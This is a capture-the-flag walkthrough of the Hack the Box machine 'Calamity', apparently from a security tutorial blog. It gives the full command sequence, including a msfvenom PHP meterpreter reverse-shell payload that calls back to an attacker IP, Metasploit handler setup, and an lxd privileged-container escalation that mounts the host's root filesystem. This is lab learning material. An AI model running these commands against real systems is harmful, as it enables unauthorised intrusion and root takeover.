Hello friends!! Today we are going to solve another CTF challenge “Calamity” which is available online for those who want to increase their skill in penetration testing and black box testing. Shrek is retried vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have collection of vulnerable labs as challenges from beginners to Expert level.
Task: find user.txt and root.txt file in victim’s machine.
Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.27 so let’s begin with nmap port enumeration.
nmap -A 10.10.10.27
From given below image, you can observe we found port 22 and 80 are open in victim’s network.
As port 80 is running http on the target machine, so we open the ip address in our browser.
We don’t find anything on the homepage so we use dirb to enumerate the directories.
Now we open admin.php, and find a login page. We take a look at the source page but we don’t find anything.
When we use curl to access the page we find a password commented in the html page.
curl -v http://10.10.10.27/admin.php
We try the username admin and the password we find in the page to login through the page. We then get access to a page that allows us to run php code in it.
We first try to execute normal php payload but are unable to get a stable tty shell, so we use base64 encoded php shell to exploit this web application. We generate a base64 encoded shell using metasploit.
msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.3 lport=4444 -e php/base64 -f raw
We paste this shell in the target machine’s page between <?php ?> tag.
We setup our listener using metasploit to get reverse shell. As soon as we run our shell on the page we get the reverse shell.
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 10.10.14.3
msf exploit(multi/handler) > set lport 4444
msf exploit(multi/handler) > exploit
After getting reverse shell we enumerate through the directories, in /home/xalvas we find a file called user.txt. When we open user.txt we find our first flag.
We also find a file called recov.wav; we download it to our system to gain further information.
download recov.wav /root/Desktop
We go to alarmclocks directory inside xalvas directory and find 1 mp3 and 1 wav file. We download both files into our system.
download rick.wav /root/Desktop/
download xouzouris.mp3 /root/Desktop
We use a tool called audacity to perform steganography on the audio files. Listening to the audio we find 2 of them sound similar. We load recov.wav and rick.wav into audacity, invert rick.wav then export the combination of both. After combining both the files we find a password in the audio “18547936..*”
We use username as xalvas and password that we found in the audio file to login through ssh into the target machine. When we run id command we find that the user is added in lxd group.
As lxd is a container technology we can run processes as root using lxd. To exploit this we download “lxd alpine builder” to create an image of alpine linux.
git clone https://github.com/saghul/lxd-alpine-builder.git
Now create a 32-bit Alpine linux image using lxd alpine builder.
We send the linux image to the target machine using scp.
scp alpine-v3.7-i686-20180405_0501.tar.gz email@example.com:
We go to the target machine and import the linux image and create an image called ignite with administrative privileges.
lxc image import alpine-v3.7-i686-20180405_0501.tar.gz –alias alpine
lxc image list
lxc init alpine ignite -c security.privileged=true
We mount the whole filesystem into the container; we start the container and execute the shell the shell inside. After spawning the shell we open root.txt in /mnt/root/root directory and find the final flag.
lxc config device add ignite mydevice mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
Autthor: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here